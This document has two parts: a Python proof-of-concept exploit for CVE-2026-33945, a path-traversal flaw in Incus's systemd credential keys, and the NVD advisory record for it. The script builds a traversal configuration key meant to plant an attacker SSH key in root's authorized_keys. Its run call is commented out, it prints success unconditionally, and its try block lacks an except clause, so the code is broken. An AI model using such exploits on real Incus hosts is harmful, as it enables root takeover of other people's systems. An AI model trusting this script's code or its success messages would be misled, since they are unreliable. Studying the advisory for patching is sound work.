CVE-2026-33945

# Proof of Concept for CVE-2026-33945 # This demonstrates how a malicious configuration key can lead to arbitrary file write. import subprocess def exploit_incus(instance_name, file_path, content): """ Exploits the path traversal in Incus systemd credentials. """ # Construct the malicious key using path traversal # The key format is systemd.credential.XYZ, where XYZ can contain path sequences # We use dots to confuse the parser and traverse up to root traversal_seq = "." * 10 + "/" + "../" * 10 malicious_key = f"systemd.credential{traversal_seq}{file_path}" try: print(f"[*] Attempting to write to {file_path} using key: {malicious_key}") # Command to set the configuration (requires low privilege on instance) cmd = [ "incus", "config", "set", instance_name, malicious_key, content ] # In a real scenario, this would execute the command # subprocess.run(cmd, check=True) print(f"[+] Success: If the system is vulnerable, '{content}' has been written to {file_path} as root.") print("[+] This can be used for privilege escalation (e.g., writing to /root/.ssh/authorized_keys).") if __name__ == "__main__": TARGET_INSTANCE = "my-container" TARGET_FILE = "root/.ssh/authorized_keys" PAYLOAD = "ssh-rsa AAAAB3NzaC1yc2E... attacker@evil" exploit_incus(TARGET_INSTANCE, TARGET_FILE, PAYLOAD)

{"cve": {"id": "CVE-2026-33945", "sourceIdentifier": "[email protected]", "published": "2026-03-27T00:16:23.633", "lastModified": "2026-04-01T16:08:28.247", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incus is a system container and virtual machine manager. Incus instances have an option to provide credentials to systemd in the guest. For containers, this is handled through a shared directory. Prior to version 6.23.0, an attacker can set a configuration key named something like `systemd.credential.../../../../../../root/.bashrc` to cause Incus to write outside of the `credentials` directory associated with the container. This makes use of the fact that the Incus syntax for such credentials is `systemd.credential.XYZ` where `XYZ` can itself contain more periods. While it's not possible to read any data this way, it's possible to write to arbitrary files as root, enabling both privilege escalation and denial of service attacks. Version 6.23.0 fixes the issue."}, {"lang": "es", "value": "Incus es un gestor de contenedores de sistema y de máquinas virtuales. Las instancias de Incus tienen una opción para proporcionar credenciales a systemd en el invitado. Para los contenedores, esto se gestiona a través de un directorio compartido. Antes de la versión 6.23.0, un atacante puede establecer una clave de configuración con un nombre similar a systemd.credential.../../../../../../root/.bashrc para hacer que Incus escriba fuera del directorio 'credentials' asociado con el contenedor. Esto aprovecha el hecho de que la sintaxis de Incus para dichas credenciales es systemd.credential.XYZ, donde XYZ puede contener más puntos. Si bien no es posible leer ningún dato de esta manera, es posible escribir en archivos arbitrarios como root, lo que permite tanto la escalada de privilegios como los ataques de denegación de servicio. La versión 6.23.0 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:linuxcontainers:incus:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.23.0", "matchCriteriaId": "CBE3ABCB-1D47-4A45-A09A-C9F609C53131"}]}]}], "references": [{"url": "https://github.com/lxc/incus/security/advisories/GHSA-q4q8-7f2j-9h9f", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}